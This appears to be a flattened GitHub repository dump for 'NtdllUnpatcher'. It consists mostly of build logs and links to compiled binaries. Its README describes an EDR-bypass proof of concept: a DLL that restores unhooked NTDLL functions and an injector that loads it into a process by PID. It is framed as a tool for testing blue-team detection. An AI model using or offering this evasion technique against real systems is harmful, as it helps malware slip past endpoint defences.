/NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/NtdllUnpatcher_Injector.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 2 | Release|x64|C:\Users\devl\source\repos\NtdllUnpatcher\| 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/NtdllUnpatcher_Injector.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/NtdllUnpatcher_Injector.write.1u.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/NtdllUnp.59AE6F00.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnpatcher_Injector.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher_injector\x64\release\vc141.pdb 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher_injector\x64\release\ntdllunpatcher_injector.obj 3 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher_injector\x64\release\ntdllunp.59ae6f00.tlog\cl.command.1.tlog 4 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher_injector\x64\release\ntdllunp.59ae6f00.tlog\cl.read.1.tlog 5 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher_injector\x64\release\ntdllunp.59ae6f00.tlog\cl.write.1.tlog 6 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher_injector\x64\release\ntdllunp.59ae6f00.tlog\link.command.1.tlog 7 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher_injector\x64\release\ntdllunp.59ae6f00.tlog\link.read.1.tlog 8 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher_injector\x64\release\ntdllunp.59ae6f00.tlog\link.write.1.tlog 9 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnpatcher_Injector.log: -------------------------------------------------------------------------------- 1 |  NtdllUnpatcher_Injector.cpp 2 | Generating code 3 | All 7 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 4 | Finished generating code 5 | NtdllUnpatcher_Injector.vcxproj -> C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher_Injector.exe 6 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/NtdllUnpatcher_Injector.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/NtdllUnpatcher_Injector.obj -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Release/vc141.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Release/vc141.pdb -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NtdllUnpatcher 2 | Example code for EDR bypassing, please use this for testing blue team detection capabilities against this type of malware that will bypass EDR's userland hooks. Code is a bit spaghetti-like at the moment and serves only as a PoC. Not for malicious use. 3 | Note that this particular code was tested on Windows 10 17763. 4 | 5 | # How To Use 6 | NtdllUnpatcher: This may be compiled as a .lib or .dll and does the heavy work of loading an unhooked copy of NTDLL into memory and patching the current hooked functions to redirect to their unhooked counterparts, to enable the bypass with any code you already have simply compile with this .lib and call the InitializeHooks() routine. Otherwise this may be compiled as a .dll and injected into a closed-source program through the use of a loader. Note that the current project configurations are only setup for the x64 release build. 7 | 8 | NtdllUnpatcher_Injector: This is a loader that will inject a DLL into a PID. This may be used to load the NtdllUnpatcher.dll into a closed-source program to enable NTDLL hook bypasses for the targeted application. Usage is: NtdllUnpatcher_Injector . Currently the project configurations are only setup for the x64 release build. 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /x64/Release/NtdllUnpatcher.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/x64/Release/NtdllUnpatcher.dll -------------------------------------------------------------------------------- /x64/Release/NtdllUnpatcher.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/x64/Release/NtdllUnpatcher.lib -------------------------------------------------------------------------------- /x64/Release/NtdllUnpatcher_Injector.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/x64/Release/NtdllUnpatcher_Injector.exe --------------------------------------------------------------------------------